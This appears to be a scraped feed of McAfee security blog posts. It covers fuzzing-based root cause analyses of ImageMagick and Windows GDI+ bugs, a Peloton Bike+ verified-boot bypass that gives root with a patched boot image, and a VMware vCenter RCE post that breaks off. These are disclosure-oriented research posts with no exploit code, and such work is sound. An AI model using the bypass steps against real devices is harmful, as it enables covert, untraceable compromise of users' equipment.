The root cause here is that there are no proper bounds checks and the program tries to read data beyond the allocated buffer size on the heap, while reading the strip data inside a for loop.

This causes a crash in ImageMagick as we can see below:

Root cause

Therefore, to summarize, the program crashes because:

  1. The program allocates 248 bytes of memory to process strip data for image, a pointer ‚Äúp‚ÄĚ points to this memory.
  2. Inside a for loop this pointer is increased by ‚Äú14‚ÄĚ or ‚Äú0xE‚ÄĚ for number of rows in the image, which in this case is 32.
  3. Based on this calculation, 32*14=448 bytes or more amount of memory is required but only 248 in actual memory were allocated.
  4. The program tries to read data assuming total memory is of 448+ bytes, but the fact that only 248 bytes are available causes an Out of Bound memory read issue.

How it was fixed?

If we check at the patch diff, we can see that the following changes were made to fix this issue:

Here the 2nd argument to ‚ÄúAcquireQuantumMemory‚ÄĚ is multiplied by 2 thus increasing the total amount of memory and preventing this Out of Bound read issue from heap memory. The total memory allocated is 496 bytes, 248*2=496 bytes, as we can see below:

Another issue with the fix:

A new version of ImageMagick 7.0.46 was released to fix this issue. While the patch fixes the memory allocation issue, if we check the code below, we can see that there was a call to memset which didn’t set the proper memory size to zero.

Memory was allocated extent*2*sizeof(*strip_pixels) but in this memset to 0 was only done for extent*sizeof(*strip_pixels). This means half of the memory was set to 0 and rest contained 0xbebebebe, which is by default for ASAN new memory allocation.

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing various image files requires deep understanding of various file formats and thus it is possible that something may not be exactly implemented or missed. This can lead to various vulnerabilities in such image processing software. Some of this vulnerability can lead to DoS and some can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure them. We work very closely with various vendors and do responsible disclosure. This shows McAfee’s commitment towards securing the software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate risk arriving from such threats.

We would like to thank and appreciate ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version to fix this issue.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blogs.

‚úá McAfee Blogs

Analyzing CVE-2021-1665 ‚Äď Remote Code Execution Vulnerability in Windows GDI+

By: Hardik Shah ‚ÄĒ
Consejos para protegerte de quienes intentan hackear tus correos electrónicos

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use different graphics functionality on video displays as well as printers. Windows applications don’t directly access graphics hardware such as device drivers, but they interact with GDI, which in turn then interacts with device drivers. In this way, there is an abstraction layer to Windows applications and a common set of APIs for everyone to use.

Because of its complex format, GDI+ has a known history of various vulnerabilities. We at McAfee continuously fuzz various open source and closed source software including windows GDI+. Over the last few years, we have reported various issues to Microsoft in various Windows components including GDI+ and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability which we found using WinAFL: CVE-2021-1665 ‚Äď GDI+ Remote Code Execution Vulnerability.¬† This issue was fixed in January 2021 as part of a Microsoft Patch.

What is WinAFL?

WinAFL is a Windows port of a popular Linux AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL uses dynamic binary instrumentation using DynamoRIO and it requires a program called as a harness. A harness is nothing but a simple program which calls the APIs we want to fuzz.

A simple harness for this was already provided with WinAFL, we can enable ‚ÄúImage->GetThumbnailImage‚ÄĚ code which was commented by default in the code. Following is the harness code to fuzz GDI+ image and GetThumbnailImage API:

 

As you can see, this small piece of code simply creates a new image object from the provided input file and then calls another function to generate a thumbnail image. This makes for an excellent attack vector and can affect various Windows applications if they use thumbnail images. In addition, this requires little user interaction, thus software which uses GDI+ and calls GetThumbnailImage API, is vulnerable.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. For that we can use Google or GitHub in addition to further test corpus available from various software and public EMF files which were released for other vulnerabilities. We have generated a few test files by making changes to a sample code provided on Microsoft’s site which generates an EMF file with EMFPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57

Minimizing Corpus:

After we have collected an initial corpus file, we need to minimize it. For this we can use a utility called winafl-cmin.py as follows:

winafl-cmin.py -D D:\\work\\winafl\\DynamoRIO\\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 ‚ÄĒ gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We need to provide a function name to WinAFL. It will save the program state at the start of the function and take one input file from the corpus, mutate it, and feed it to the function.

It will monitor this for any new code paths or crashes. If it finds a new code path, it will consider the new file as an interesting test case and will add it to the queue for further mutation. If it finds any crashes, it will save the crashing file in crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program, collected, and minimized the corpus, we can run this command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 ‚ÄĒcoverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 ‚ÄĒ gdiplus_hardik.exe @@

Results:

We found a few crashes and after triaging unique crashes, and we found a crash in ‚Äúgdiplus!BuiltLine::GetBaselineOffset‚ÄĚ which looks as follows in the call stack below:

As can be seen in the above image, the program is crashing while trying to read data from a memory address pointed by edx+8. We can see it registers ebx, ecx and edx contains c0c0c0c0 which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to ‚Äúgdiplus!FullTextImager::RenderLine‚ÄĚ function.

Patch Diffing to See If We Can Find the Root Cause

To figure out a root cause, we can use patch diffing‚ÄĒnamely, we can use IDA BinDiff plugin to identify what changes have been made to patched file. If we are lucky, we can easily find the root cause by just looking at the code that was changed. So, we can generate an IDB file of patched and unpatched versions of gdiplus.dll and then run IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and this seems to be a destructor for BuiltLine Object :

We can also see that there are a few functions where the similarity score is < 1 and one such function is FullTextImager::BuildAllLines as shown below:

Now, just to confirm if this function is really the one which was patched, we can run our test program and POC in windbg and set a break point on this function. We can see that the breakpoint is hit and the program doesn’t crash anymore:

Now, as a next step, we need to identify what has been changed in this function to fix this vulnerability. For that we can check flow graph of this function and we see something as follows. Unfortunately, there are too many changes to identify the vulnerability by simply looking at the diff:

The left side illustrates an unpatched dll while right side shows a patched dll:

  • Green indicates that the patched and unpatched blocks are same.
  • Yellow blocks indicate there has been some changes between unpatched and patched dlls.
  • Red blocks call out differences in the dlls.

If we zoom in on the yellow blocks we can see following:

We can note several changes. Few blocks are removed in the patched DLL, so patch diffing will alone will not be sufficient to identify the root cause of this issue. However, this presents valuable hints about where to look and what to look for when using other methods for debugging such as windbg. A few observations we can spot from the bindiff output above:

  • In the unpatched DLL, if we check carefully we can see that there is a call to ‚ÄúGetuntrimmedCharacterCount‚ÄĚ function and later on there is another call to a function ‚ÄúSetSpan::SpanVector‚ÄĚ
  • In the patched DLL, we can see that there is a call to ‚ÄúGetuntrimmedCharacterCount‚ÄĚ where a return value stored inside EAX register is checked. If it‚Äôs zero, then control jumps to another location‚ÄĒa destructor for BuiltLine Object, this was newly added code in the patched DLL:

So we can assume that this is where the vulnerability is fixed. Now we need to figure out following:

  1. Why our program is crashing with the provided POC file?
  2. What field in the file is causing this crash?
  3. What value of the field?
  4. Which condition in program which is causing this crash?
  5. How this was fixed?

EMF File Format:

EMF is also known as enhanced meta file format which is used to store graphical images device independently. An EMF file is consisting of various records which is of variable length. It can contain definition of various graphic object, commands for drawing and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consist of the following records:

  1. EMF Header ‚Äď This contains information about EMF structure.
  2. EMF Records ‚Äď This can be various variable length records, containing information about graphics properties, drawing order, and so forth.
  3. EMF EOF Record ‚Äď This is the last record in EMF file.

Detailed specifications of EMF file format can be seen at Microsoft site at following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca

Locating the Vulnerable Record in the EMF File:

Generally, most of the issues in EMF are because of malformed or corrupt records. We need to figure out which record type is causing this crash. For this if we look at the call stack we can see following:

We can notice a call to function ‚Äúgdiplus!GdipPlayMetafileRecordCallback‚ÄĚ

By setting a breakpoint on this function and checking parameter, we can see following:

We can see that EDX contains some memory address and we can see that parameter given to this function are: 00x00401c,0x00000000 and 0x00000044.

Also, on checking the location pointed by EDX we can see following:

If we check our POC EMF file, we can see that this data belongs to file from offset: 0x15c:

By going through EMF specification and manually parsing the records, we can easily figure out that this is a ‚ÄúEmfPlusDrawString‚ÄĚ record, the format of which is shown below:

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =

Now that we have located the record that seems to be causing the crash, the next thing is to figure out why our program is crashing. If we debug and check the code, we can see that control reaches to a function ‚Äúgdiplus!FullTextImager::BuildAllLines‚ÄĚ. When we decompile this code, we can see something¬† like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

  1. Inside ‚ÄúBuiltline::BuildAllLines‚ÄĚ function, there is a while loop inside which the program allocates 0x60 bytes of memory. Then it calls the ‚ÄúBuiltline::BuiltLine‚ÄĚ
  2. The ‚ÄúBuiltline::BuiltLine‚ÄĚ function moves data to the newly allocated memory and then it calls ‚ÄúBuiltLine::GetUntrimmedCharacterCount‚ÄĚ.
  3. The return value of ‚ÄúBuiltLine::GetUntrimmedCharacterCount‚ÄĚ is added to loop counter, which is ECX. This process will be repeated until the loop counter (ECX) is < string length(EAX), which is 0x14 here.
  4. The loop starts from 0, so it should terminate at 0x13 or it should terminate when the return value of ‚ÄúGetUntrimmedCharacterCount‚ÄĚ is 0.
  5. But in the vulnerable DLL, the program doesn‚Äôt terminate because of the way loop counter is increased. Here, ‚ÄúBuiltLine::GetUntrimmedCharacterCount‚ÄĚ returns 0, which is added to Loop counter(ECX) and doesn‚Äôt increase ECX value. It allocates 0x60 bytes of memory and creates another line, corrupting the data that later leads the program to crash. The loop is executed for 21 times instead of 20.

In detail:

1. Inside ‚ÄúBuiltline::BuildAllLines‚ÄĚ memory will be allocated for 0x60 or 96 bytes, and in the debugger it looks as follows:

2. Then it calls ‚ÄúBuiltLine::BuiltLine‚ÄĚ function and moves the data to newly allocated memory:

3. This happens in side a while loop and there is a function call to ‚ÄúBuiltLine::GetUntrimmedCharacterCount‚ÄĚ.

4. Return value of ‚ÄúBuiltLine::GetUntrimmedCharacterCount‚ÄĚ is stored in a location 0x12ff2ec. This value will be 1 as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines if ecx< eax. If true, it will continue loop, else it will jump to another location:

7. Now in the vulnerable version, loop doesn‚Äôt exist if the return value of ‚ÄúBuiltLine::GetUntrimmedCharacterCount‚ÄĚ is 0, which means that this 0 will be added to ECX and which means ECX will not increase. So the loop will execute 1 more time with the ‚ÄúECX‚ÄĚ value of 0x13. Thus, this will lead to loop getting executed 21 times rather than 20 times. This is the root cause of the problem here.

Also after some debugging, we can figure out why EAX contains 14. It is read from the POC file at offset: 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches to ‚ÄúFullTextImager::Render‚ÄĚ function corrupting the value of EAX because it reads the unused memory:

This will be passed as an argument to ‚ÄúFullTextImager::RenderLine‚ÄĚ function:

Later, program will crash while trying to access this location.

Our program was crashing while processing EmfPlusDrawString record inside the EMF file while accessing an invalid memory location and processing string data field. Basically, the program was not verifying the return value of ‚Äúgdiplus!BuiltLine::GetUntrimmedCharacterCount‚ÄĚ function and this resulted in taking a different program path that¬† corrupted the register and various memory values, ultimately causing the crash.

How this issue was fixed?

As we have figured out by looking at patch diff above, a check was added which determined the return value of ‚Äúgdiplus!BuiltLine::GetUntrimmedCharacterCount‚ÄĚ function.

If the retuned value is 0, then program xor’s EBX which contains counter and jump to a location which calls destructor for Builtline Object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend our users to apply proper updates and keep their Windows deployment current.

We at McAfee are continuously fuzzing various open source and closed source library and work with vendors to fix such issues by responsibly disclosing such issues to them giving them proper time to fix the issue and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.

 

 

 

 

The post Analyzing CVE-2021-1665 ‚Äď Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blogs.

‚úá McAfee Blogs

McAfee Labs Report Highlights Ransomware Threats

By: Raj Samani ‚ÄĒ

The McAfee Advanced Threat Research team today published the McAfee Labs Threats Report: June 2021.

In this edition we introduce additional context into the biggest stories dominating the year thus far including recent ransomware attacks. While the topic itself is not new, there is no question that the threat is now truly mainstream.

This Threats Report provides a deep dive into ransomware, in particular DarkSide, which resulted in an agenda item in talks between U.S. President Biden and Russian President Putin. While we have no intention of detailing the political landscape, we certainly do have to acknowledge that this is a threat disrupting our critical services. Furthermore, adversaries are supported within an environment that make digital investigations challenging with legal barriers that make the gathering of digital evidence almost impossible from certain geographies.

That being said, we can assure the reader that all of the recent campaigns are incorporated into our products, and of course can be tracked within our MVISION Insights preview dashboard.

This dashboard shows that ‚Äď beyond the headlines ‚Äď many more countries have experienced such attacks. What it will not show is that victims are paying the ransoms, and criminals are introducing more Ransomware-as-a-Service (RaaS) schemes as a result. With the five-year anniversary of the launch of the No More Ransom initiative now upon us it‚Äôs fair to say that we need more global initiatives to help combat this threat.

Q1 2021 Threat Findings

McAfee Labs threat research during the first quarter of 2021 include:

  • New malware samples averaging 688 new threats per minute
  • Coin Miner threats surged 117%
  • New Mirai malware variants drove increase in Internet of Things and Linux threats

Additional Q1 2021 content includes:

  • McAfee Global Threat Intelligence (GTI) queries and detections
  • Disclosed Security Incidents by Continent, Country, Industry and Vectors
  • Top MITRE ATT&CK Techniques APT/Crime

We hope you enjoy this Threats Report. Don’t forget to keep track of the latest campaigns and continuing threat coverage by visiting our McAfee Threat Center. Please stay safe.

The post McAfee Labs Report Highlights Ransomware Threats appeared first on McAfee Blogs.

‚úá McAfee Blogs

A New Program for Your Peloton ‚Äď Whether You Like It or Not

By: Sam Quinn ‚ÄĒ
Connected Fitness

Executive Summary 

The McAfee Advanced Threat Research team (ATR) is committed to uncovering security issues in both software and hardware to help developers provide safer products for businesses and consumers. As security researchers, something that we always try to establish before looking at a target is what our scope should be. More specifically, we often assume well-vetted technologies like network stacks or the OS layers are sound and instead focus our attention on the application layers or software that is specific to a target. Whether that approach is comprehensive sometimes doesn’t matter; and it’s what we decided to do for this project as well, bypassing the Android OS itself and with a focus on the Peloton code and implementations. During our research process, we uncovered a flaw (CVE-2021-33887) in the Android Verified Boot (AVB) process, which was initially out of scope, that left the Peloton vulnerable. 

For those that are not familiar with Peloton,¬†it is¬†a¬†brand¬†that¬†has¬†combined high end¬†exercise equipment with¬†cutting-edge¬†technology.¬†Its¬†products¬†are equipped with a large tablet that¬†interfaces¬†with the¬†components of the fitness machine,¬†as well as¬†provides¬†a way to attend virtual workout classes over the internet.¬†‚ÄúUnder the hood‚Ä̬†of this glossy exterior, however,¬†is a standard Android tablet, and this hi-tech¬†approach to exercise equipment has not¬†gone unnoticed.¬†Viral marketing mishaps aside, Peloton has garnered attention recently regarding concerns surrounding the privacy and security of¬†its¬†products.¬†So,¬†we decided to¬†take a look¬†for ourselves¬†and purchased a Pelton Bike+.

Attempting to Backup 

One of the first things that we usually try do when starting a new project, especially when said projects involve large expenses like the Peloton, is to try to find a way to take a backup or a system dump that could be used if a recovery is ever needed. Not all of our research techniques keep the device in a pristine state (we’d be poor hackers if they did), and having the ability to restore the device to its factory settings is a safety net that we try to implement on our targets.  

Because we are working with a normal Android device with only the Peloton customizations running¬†at the application layer,¬†many of the processes¬†used¬†to back¬†up¬†an Android phone¬†would also work with¬†the Peloton.¬†It is common in the¬†Android custom ROM scene¬†to use a¬†custom recovery¬†image that allows the user to¬†take full flash dumps of each critical¬†partition¬†and¬†provides¬†a method to¬†restore them later.¬†In such communities,¬†it often¬†also¬†goes¬†without saying that¬†the device must¬†first¬†be¬†unlocked¬†in order to perform any of these steps.¬†While the Android OS allows users to flash these critical partitions,¬†there are restrictions in place that¬†typically¬†prevent an attacker from gaining access to the ‚Äúcurrently‚ÄĚ running system.¬†If an attacker was able to get their hands on an Android device¬†with the¬†goal of¬†installing a¬†rootkit,¬†they would have to jump through some hoops.¬†The first step that an attacker would need to¬†take¬†is¬†to¬†enable¬†‚ÄúOriginal Equipment Manufacturer¬†(OEM)¬†Unlocking‚ÄĚ, which is a user mode setting within the ‚Äúdeveloper options‚ÄĚ menu. Even with physical access to the bootloader, an attacker would not be able to ‚Äúunlock‚ÄĚ the Android device unless this setting is checked. This option is usually secured behind the user‚Äôs password,¬†PIN, or biometric phone lock, preventing an attacker from accessing it easily.¬†The second security measure in place is that even with the ‚ÄúOEM Unlocking‚ÄĚ setting on, issuing commands to the bootloader to perform the unlock¬†first¬†causes¬†all data on¬†the¬†Android device, including applications, files, passwords, etc., to be wiped.¬†This way,¬†even¬†if an attacker did gain access to¬†the¬†Android device of an unsuspecting victim, they wouldn‚Äôt be able to install a rootkit or modify the existing kernel without deleting all the data,¬†which¬†both prevents personal data from falling into the attacker‚Äôs hands¬†and makes it obvious the device has been tampered with.¬†

For this research effort, we resisted the urge to unlock the Peloton, as there are ways for apps to query the unlock status of a device within Android, and we wanted to ensure that any vulnerabilities we found weren’t the result of the device behaving differently due to it being unlocked. These discrepancies that arise from our research are usually identified by having two target devices: one to serve as the control and the other to serve as the test device. Unfortunately, we only had one Peloton to play with. Another issue was that the Peloton hardware is not very common and the developers of the aforementioned custom recovery images, like Team Win Recovery Project (TWRP), don’t create images for every device,  just the most common ones. So, the easy method of taking a backup would not only require unlocking the device but also trying to create our own custom recovery image.  

This left us as at a¬†crossroads.¬†We could unlock the bootloader and root the device,¬†granting us¬†access to the¬†flash¬†memory¬†block devices¬†(raw¬†interfaces to the flash partitions)¬†internally,¬†which would allow us¬†to create and restore backups¬†as needed. However,¬†as mentioned before, this would leave the bike in a recognizably ‚Äútampered‚ÄĚ state.¬†Alternatively,¬†we could try to¬†capture one of¬†the¬†bike‚Äôs¬†Over-The-Air (OTA)¬†updates¬†to use as¬†a¬†backup,¬†but¬†we¬†would still need to ‚Äúunlock‚ÄĚ the device to¬†actually flash¬†the OTA¬†image¬†manually.¬†Both¬†options were less than ideal so we kept¬†looking for other solutions.¬†

Android Verified Boot Process

Just as Secure Boot provides a security mechanism for properly booting the OS on Windows PCs, Android has implemented measures to control the boot process, called Android Verified Boot (AVB).¬†According to Android‚Äôs documentation, AVB¬†‚Äúrequires cryptographically verifying all executable code and data that is part of the Android version being booted before it is used. This includes the kernel (loaded from the boot partition), the device tree (loaded from the¬†dtbo¬†partition), system partition, vendor partition, and so on.‚Ä̬†

The Peloton Bike+ ships with the default settings of ‚ÄúVerity Mode‚ÄĚ set to true,¬†as well as¬†‚ÄúDevice Unlocked‚ÄĚ and ‚ÄúDevice Critical Unlocked‚ÄĚ set to false,¬†which¬†is¬†intended to prevent¬†the loading of¬†modified boot images¬†and provide a way to determine if the device has been tampered with. This¬†information¬†was¬†verified by running¬†fastboot¬†oem¬†device-info¬†on the Peloton, as demonstrated in¬†Figure¬†1.¬†

 

Figure 1: OEM device info showing verity mode and unlocked status. 

To clarify, a simplified Android boot process can be visualized as follows: 


Figure 2: Simplified Android Boot Process 

If modified code is found at any of the stages in Figure 2, the boot process should abort or, if the device is unlocked, warn the user that the images are not verified and give the option to the user to abort the boot. 

Given that we defined our scope of this project to not include the Android boot process as a part of our research and verifying that Peloton has attempted to use the security measures provided by Android, we again found ourselves debating if a backup would be possible.  

In¬†newer¬†Android¬†releases,¬†including the Peloton,¬†the¬†update method¬†uses Android‚Äôs¬†Seamless System Updates (A/B). This update method¬†no longer needs¬†the ‚Äúrecovery‚ÄĚ partition,¬†forcing¬†users who wish to use a custom recovery to use the¬†fastboot¬†boot¬†command¬†which will download and boot the supplied¬†image. This is a temporary boot¬†that¬†doesn‚Äôt ‚Äúflash‚Äú or¬†alter¬†any of the flash partitions of the¬†device¬†and will revert to the previous¬†boot image on restart.¬†Since¬†this option allows for modified code to be¬†executed,¬†it is only available when the device is in an unlocked state¬†and will error out¬†with a message¬†stating¬†‚ÄúPlease unlock device to enable this command,‚Ä̬†if attempted on a locked device.¬†¬†

This is a good security implementation because if this command was always allowed, it would be very similar to the process of booting from a live USB on your PC, where you can login as a root user and have full control over the underlying system and components. 

Booting Modified Code 

This is where our luck or maybe¬†na√Įvet√©¬†worked¬†to our¬†advantage.¬†Driven by¬†our reluctance to unlock the device and our desire to¬†make a backup,¬†we¬†tried to boot a generic TWRP recovery image¬†just¬†to see what would happen. The¬†image¬†ended up¬†leaving us at¬†a black screen,¬†and¬†since each¬†recovery image needs to contain a small kernel with the correct drivers for the display, touch digitizer,¬†and other device‚Äďspecific hardware,¬†this was¬†to be¬†expected.¬†What we didn‚Äôt¬†expect, however,¬†was for¬†it to¬†get past the¬†fastboot¬†boot¬†command.¬†While we didn‚Äôt get a custom recovery running,¬†it did¬†tell us one¬†thing;¬†the¬†system was not verifying that the device was unlocked before attempting to boot a custom image.¬†Normally this command would be¬†denied on a ‚Äúlocked‚ÄĚ device and would have just errored out¬†on the¬†fastboot¬†command, as mentioned previously.¬†

It is also important to point out that despite¬†having¬†booted¬†a modified image, the internal fuse¬†had¬†not been burned. These fuses are usually burned during the OEM unlocking process to identify if a device has allowed for a different ‚Äúroot of trust‚ÄĚ to be installed. The burning of such a fuse is a permanent operation and a burnt fuse often indicates that the device has been tampered with. As shown in¬†Figure 3, the ‚ÄúSecure Boot‚ÄĚ fuse¬†was¬†still present, and the device¬†was¬†reporting a locked bootloader.¬†

Figure 3: Secure boot enabled with fused protection 

Acquiring an OTA Image 

This¬†discovery¬†was¬†unexpected¬†and¬†we¬†felt like we¬†had¬†stumbled upon a flaw that¬†gave us the ability to finally take a backup of the device and leave the Peloton in an ‚Äúuntampered‚ÄĚ state.¬†Knowing that a¬†custom image could be booted even with a ‚Äúlocked‚ÄĚ bootloader,¬†we¬†began looking at ways to gather a valid¬†boot image, which would contain the correct kernel drivers to¬†facilitate a successful¬†boot.¬†If¬†we could piece together the¬†OTA update URL and just download an update package¬†directly from Peloton,¬†it¬†would¬†likely¬†contain a boot image¬†that¬†we could modify.¬†Having the ability to modify a boot image¬†would¬†give us root¬†and access to the¬†blocked¬†devices.¬†

Even with just¬†ADB debugging¬†enabled we were able to pull the¬†Peloton‚Äďspecific applications from the device.¬†We listed¬†all¬†the Peloton¬†APKs¬†and¬†sought out the¬†ones that could help us get the OTA path,¬†shown in¬†Figure¬†4.¬†

Figure 4: Listing Peloton Specific Applications and Highlighting the one related to OTA Updates. 

Finding the name OTAService promising, we pulled down the APK and began to reverse-engineer it using JADX. After some digging, we discovered how the app was building the download URL string for OTA updates, which would then be passed to beginDownload(), as seen in Figure 5. 

Figure¬†5:¬†OTA image path being constructed as ‚Äúkey‚Ä̬†

We also noticed quite a few¬†Android log¬†calls that could help us,¬†such as the one right before the call to¬†beginDownload(),¬†so¬†we¬†used¬†Android‚Äôs¬†built‚Äďin¬†logcat¬†command and grepped¬†the output¬†for ‚ÄúOTA‚Ä̬†as¬†seen in¬†Figure¬†6.¬†Doing so,¬†we were able to find¬†which S3 bucket was used for the OTA updates and¬†even¬†a file manifest¬†titled¬†OTAConfig.json.¬†¬†¬†

Figure 6: Relevant OTA logs in red 

Combining the information obtained from OTAService.apk and the logs, we were able to piece together the full path to the OTA images manifest file and names for each OTA zip file, as shown in Figure 7.  

Figure 7: Contents of OTAConfig.json 

Our next step was¬†to extract the contents of the OTA update¬†to¬†get¬†a¬†valid¬†boot.img¬†file that would contain¬†all¬†the specific kernel¬†drivers for the Peloton hardware. Since the Peloton is using Android‚Äôs¬†A/B partitions,¬†which facilitate seamless updates,¬†the update packages¬†were¬†stored in a ‚Äúpayload.bin‚ÄĚ format.¬†Using the¬†Android payload dumper¬†tool,¬†we were able to extract all of the images¬†contained in the bin file.¬†

Modifying the Boot Image 

Once the¬†boot.img¬†was¬†extracted,¬†we needed a way to modify the¬†initial kernel to allow us to gain root access on the device.¬†Although there are a¬†variety¬†of¬†ways to¬†accomplish¬†this,¬†we decided to¬†keep things simple and¬†just use the¬†Magisk¬†installer to patch the¬†boot.img¬†file to include the ‚Äúsu‚ÄĚ binary. With the¬†boot.img¬†patched,¬†we were able to use the fastboot¬†boot¬†command again but this time passing¬†it our patched¬†boot.img¬†file. Since the Verified Boot process on the Peloton¬†failed¬†to identify the modified boot image as tampered, the OS booted¬†normally¬†with the patched¬†boot.img¬†file. After this process¬†was¬†complete, the Peloton Bike+¬†was¬†indistinguishable from its¬†‚Äúnormal‚ÄĚ state under visual¬†inspection¬†and¬†the process left no¬†artifacts that would¬†tip off the user¬†that¬†the Pelton had¬†been compromised.¬†But¬†appearances can be deceiving, and¬†in reality the Android OS¬†had now been¬†rooted,¬†allowing¬†us to use¬†the¬†‚Äúsu‚ÄĚ command to become root and¬†perform¬†actions¬†with UID=0,¬†as seen in¬†Figure 8.¬†

Figure 8: Booting modified boot.img and executing whoami as Root 

Impact Scenarios 

As we just demonstrated, the ability to bypass the Android Verified Boot process can lead to the Android OS being compromised by an attacker with physical access. A worst-case scenario for such an attack vector might involve a malicious agent booting the Peloton with a modified image to gain elevated privileges and then leveraging those privileges to establish a reverse shell, granting the attacker unfettered root access on the bike remotely. Since the attacker never has to unlock the device to boot a modified image, there would be no trace of any access they achieved on the device. This sort of attack could be effectively delivered via the supply chain process. A malicious actor could tamper with the product at any point from construction to warehouse to delivery, installing a backdoor into the Android tablet without any way the end user could know. Another scenario could be that an attacker could simply walk up to one of these devices that is installed in a gym or a fitness room and perform the same attack, gaining root access on these devices for later use. The Pelobuddy interactive map in figure 9 below could help an attacker find public bikes to attack. 

Figure 9: pelobuddy.com’s interactive map to help locate public Peloton exercise equipment. 

Once an attacker has root, they could make their presence permanent by modifying the OS in a rootkit fashion, removing any need for the attacker to repeat this step. Another risk is that an attacker could modify the system to put themselves in a man-in-the-middle position and sniff all network traffic, even SSL encrypted traffic, using a technique called SSL unpinning, which requires root privileges to hook calls to internal encryption functionality. Intercepting and decrypting network traffic in this fashion could lead to users’ personal data being compromised. Lastly, the Peloton Bike+ also has a camera and a microphone installed. Having remote access with root permissions on the Android tablet would allow an attacker to monitor these devices and is demoed in the impact video below. 

Disclosure Timeline and Patch 

Given¬†the¬†simplicity and criticality¬†of the flaw, we decided to¬†disclose to Peloton¬†even as we continue to audit the device for remote vulnerabilities. We sent our vendor disclosure with full details on March 2, 2021¬†‚Äď shortly after, Peloton¬†confirmed the issue and¬†subsequently¬†released a fix for¬†it¬†in software version¬†‚ÄúPTX14A-290‚ÄĚ.¬†The patched image no longer allows for the ‚Äúboot‚ÄĚ command to work on a user¬†build, mitigating this vulnerability entirely.¬†The Peloton vulnerability disclosure¬†process was¬†smooth,¬†and the team were¬†receptive and¬†responsive¬†with all communications.¬†Further conversations with Peloton confirmed that this vulnerability is also present on Peloton Tread exercise equipment; however, the scope of our research was confined to the Bike+.

Peloton‚Äôs Head of Global Information Security, Adrian Stone, shared the following ‚Äúthis vulnerability reported by McAfee would require direct, physical access to a Peloton Bike+ or Tread. Like with any connected device in the home, if an attacker is able to gain physical access to it, additional physical controls and safeguards become increasingly important. To keep our Members safe, we acted quickly and in coordination with McAfee. We pushed a mandatory update in early June and every device with the update installed is protected from this issue.‚ÄĚ

We are continuing to investigate the Peloton Bike+, so make sure you stay up to date on McAfee’s ATR blogs for any future discoveries. 

The post A New Program for Your Peloton ‚Äď Whether You Like It or Not appeared first on McAfee Blogs.

‚úá McAfee Blogs

Are Virtual Machines the New Gold for Cyber Criminals?

By: ATR Operational Intelligence Team ‚ÄĒ
AI Cyber Security

Introduction

Virtualization technology has been an IT cornerstone for organization for years now. It revolutionized the way organizations can scale up IT systems in a heartbeat, allowing then to be more agile as opposed to investing into dedicated ‚Äúbare-metal‚ÄĚ hardware. To the outside untrained eye, it might seem that there are different machines on the network, while in fact all the ‚Äúseparate‚ÄĚ machines are controlled by a hypervisor server. Virtualization plays such a big role nowadays that it isn‚Äôt only used to spin up servers but also anything from virtual applications to virtual user desktops.

This is something cyber criminals have been noticing too and we have seen an increased interest in hypervisors. After all, why attack the single virtual machine when you can go after the hypervisor and control all the machines at once?

In recent months several high impact CVEs regarding virtualization software have been released which allowed for Remote Code Execution (RCE); initial access brokers are offering compromised VMware vCenter servers online, as well as ransomware groups developing specific ransomware binaries for encrypting ESXi servers.

VMware CVE-2021-21985 & CVE-2021-21986

On the 25th of May VMware disclosed a vulnerability impacting VMware vCenter servers allowing for Remote Code Execution on internet accessible vCenter servers, version 6.5,6.7 and 7.0. VMware vCenter is a management tool, used to manage virtual machines and ESXi servers.

CVE-2021-21985 is a remote code execution (RCE) vulnerability in the vSphere Client via the Virtual SAN (vSAN) Health Check plugin. This plugin is enabled by default. The combination of RCE and default enablement of the plugin resulted in this being scored as a critical flaw with a CVSSv3 score of 9.8.

An attacker needs to be able to access vCenter over TCP port 443 to exploit this vulnerability. It doesn’t matter if the vCenter is remotely exposed or when the attacker has internal access.

